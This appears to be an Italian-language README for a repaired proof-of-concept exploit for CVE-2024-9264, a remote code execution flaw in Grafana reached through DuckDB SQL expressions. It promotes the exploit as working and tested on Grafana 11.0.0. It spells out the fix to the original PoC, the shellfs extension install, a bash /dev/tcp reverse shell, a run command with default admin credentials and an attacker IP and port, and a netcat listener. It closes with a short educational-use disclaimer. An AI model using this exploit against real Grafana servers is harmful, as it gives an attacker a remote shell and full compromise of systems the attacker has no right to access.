
Exploit proof-of-concept corretto per CVE-2024-9264, una critica RCE di Grafana tramite espressioni SQL DuckDB. Esegue una reverse shell utilizzando l'estensione shellfs corretta e la funzione writefile().
Questa è una versione corretta del proof-of-concept exploit per CVE-2024-9264, una vulnerabilità critica di esecuzione remota di codice in Grafana (tramite espressioni SQL e DuckDB).
🔗 Avviso originale: Grafana Security Release
❌ PoC originale: Non funzionante a causa di errori di sintassi e uso scorretto di write_file()
✅ Questa versione funziona, testata su un'istanza vulnerabile di Grafana 11.0.0.
writefile() invece di write_file() (funzione DuckDB)bash -i >& /dev/tcp/...shellfsinstall shellfs from communitypython3 fixed_poc_writefile.py \
--url http://target:3000 \
--username admin \
--password admin \
--reverse-ip <YOUR_IP> \
--reverse-port 4444
Poi ascolta con:
nc -lvnp 4444
Questo progetto è solo a scopo educativo.
Non utilizzarlo contro target per cui non hai il permesso di testare.
Modificato e validato da Exerr — PoC originale di z3k0sec.